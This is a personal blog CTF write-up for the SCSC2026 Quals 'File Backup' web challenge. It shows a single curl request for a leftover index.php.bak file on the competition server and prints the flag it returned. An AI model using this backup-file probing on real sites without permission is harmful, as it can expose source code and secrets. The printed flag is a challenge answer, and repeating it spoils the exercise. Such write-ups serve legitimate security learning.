64 words
1 minutes
SCSC2026 Quals - File Backup - Web Exploitation Writeup
Event Archive

SCSC2026 Quals

Posts, writeups, and notes grouped under this event.

Archive/29 posts
Events/SCSC2026 Quals
2026-02-17
Writeup
CTF
/
Security
/
Web Exploitation

Category: Web Exploitation
URL: https://ctf.sriwijayasecuritysociety.com/
Flag: SCSC26{4h_1_f0rg3t_to_d3letE}

Challenge Description#

backup my index pls

Analysis#

Because there was no URL given for the challenge instance, I initially thought the target was the CTFd site itself. The hint “backup my index” strongly suggests a leftover backup file such as .bak, .old, or .swp.

Exploitation#

Access the backup file directly:

curl https://ctf.sriwijayasecuritysociety.com/index.php.bak

The response contained the flag directly inside the HTML:

<main role="main">
    <div class="container">
        <p>SCSC26{4h_1_f0rg3t_to_d3letE}</p>
    </div>
</main>
SCSC2026 Quals - File Backup - Web Exploitation Writeup
https://blog.rei.my.id/posts/22/scsc2026-quals-file-backup-web-exploitation-writeup/
Author
Reidho Satria
Published at
2026-02-17
License
CC BY-NC-SA 4.0
© 2026 Reidho Satria. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari